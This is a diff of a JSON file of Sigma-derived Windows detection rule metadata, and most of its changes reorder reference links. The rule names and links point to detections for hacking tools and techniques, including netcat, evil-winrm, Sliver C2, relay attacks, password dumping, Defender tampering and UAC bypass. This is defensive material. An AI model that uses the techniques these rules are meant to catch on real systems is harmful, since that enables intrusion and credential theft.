- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml" ], "tags": [ @@ -68794,9 +68967,9 @@ "logsource.product": "windows", "refs": [ "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" ], "tags": [ @@ -68829,8 +69002,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/", "https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks", + "https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml" ], "tags": [ @@ -68973,9 +69146,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", "https://twitter.com/bohops/status/1477717351017680899?s=12", + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], "tags": [ @@ -68998,8 +69171,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1564968845726580736", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", + "https://twitter.com/0gtweet/status/1564968845726580736", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], @@ -69042,16 +69215,16 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml", "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml" ], @@ -69103,10 +69276,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1186631731543236608", - "https://github.com/Neo23x0/DLLRunner", "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://github.com/Neo23x0/DLLRunner", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml" ], "tags": [ @@ -69229,7 +69402,7 @@ { "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", "meta": { - "author": "Florian Roth (Nextron Systems)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/03/24", "falsepositive": [ "Legitimate scripts that use IEX" @@ -69240,6 +69413,7 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml" ], "tags": [ @@ -69272,9 +69446,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml" ], "tags": [ @@ -69391,10 +69565,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", - "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", + "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml" ], "tags": [ @@ -69427,12 +69601,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://www.localpotato.com/", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://github.com/ohpe/juicy-potato", "https://pentestlab.blog/2017/04/13/hot-potato/", + "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", + "https://github.com/ohpe/juicy-potato", + "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://www.localpotato.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml" ], "tags": [ @@ -69573,11 +69747,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1628720819537936386", - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://twitter.com/0gtweet/status/1628720819537936386", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml" ], "tags": [ @@ -69645,8 +69819,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_execution.yml" ], "tags": [ @@ -69722,8 +69896,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222088214581825540", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml" ], "tags": [ @@ -69836,10 +70010,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://blog.sevagas.com/?Hacking-around-HTA-files", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", + "http://blog.sevagas.com/?Hacking-around-HTA-files", "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://twitter.com/mattifestation/status/1326228491302563846", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml" ], @@ -69891,9 +70065,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", "https://reaqta.com/2017/11/short-journey-darkvnc/", "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html", + "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml" ], "tags": [ @@ -70052,8 +70226,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Hackplayers/evil-winrm", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/Hackplayers/evil-winrm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml" ], "tags": [ @@ -70249,8 +70423,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ @@ -70283,8 +70457,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml" ], "tags": [ @@ -70353,8 +70527,8 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", - "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", + "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml" ], "tags": [ @@ -70420,9 +70594,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://www.poweradmin.com/paexec/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml" ], "tags": [ @@ -70455,9 +70629,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_output.yml" ], "tags": [ @@ -70525,8 +70699,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", + "https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml" ], "tags": [ @@ -70728,8 +70902,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://github.com/quarkslab/quarkspwdump", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml" ], "tags": [ @@ -70988,8 +71162,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://twitter.com/harr0ey/status/989617817849876488", + "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml" ], "tags": [ @@ -71097,8 +71271,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" ], "tags": [ @@ -71140,8 +71314,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml" ], "tags": [ @@ -71174,10 +71348,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], "tags": [ @@ -71385,9 +71559,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", + "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml" ], "tags": [ @@ -71421,8 +71595,8 @@ "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49", - "https://github.com/sensepost/ruler", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://github.com/sensepost/ruler", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml" ], "tags": [ @@ -71496,11 +71670,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", "https://twitter.com/aceresponder/status/1636116096506818562", - "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", + "https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/", "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/", "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/", + "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml" ], "tags": [ @@ -71534,8 +71708,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1618021415852335105", "https://twitter.com/nas_bench/status/1618021838407495681", + "https://twitter.com/nas_bench/status/1618021415852335105", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" ], "tags": [ @@ -71565,7 +71739,7 @@ "value": "Potentially Suspicious Child Process Of VsCode" }, { - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "description": "Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/08/12", @@ -71595,7 +71769,7 @@ } ], "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "value": "Add User to Local Administrators Group" + "value": "User Added to Local Administrators Group" }, { "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", @@ -71610,8 +71784,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://redcanary.com/blog/child-processes/", + "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml" ], "tags": [ @@ -71644,8 +71818,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" ], "tags": [ @@ -71722,10 +71896,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/974806438316072960", "https://twitter.com/vysecurity/status/873181705024266241", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", + "https://twitter.com/vysecurity/status/974806438316072960", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" ], "tags": [ @@ -71833,9 +72007,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", - "https://github.com/pr0xylife/IcedID/blob/8dd1e218460db4f750d955b4c65b2f918a1db906/icedID_09.28.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml" ], "tags": [ @@ -71858,9 +72032,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" ], "tags": [ @@ -71926,9 +72100,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/tevora-threat/SharpView/", "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" ], "tags": [ @@ -71994,8 +72168,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ @@ -72139,8 +72313,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/", - "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml" ], "tags": [ @@ -72182,9 +72356,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://nmap.org/ncat/", "https://www.revshells.com/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml" ], "tags": [ @@ -72217,11 +72391,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://twitter.com/egre55/status/1087685529016193025", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml" ], "tags": [ @@ -72254,8 +72428,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_systeminfo_execution.yml" ], "tags": [ @@ -72288,8 +72462,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" ], "tags": [ @@ -72323,8 +72497,8 @@ "logsource.product": "windows", "refs": [ "https://ss64.com/ps/foreach-object.html", - 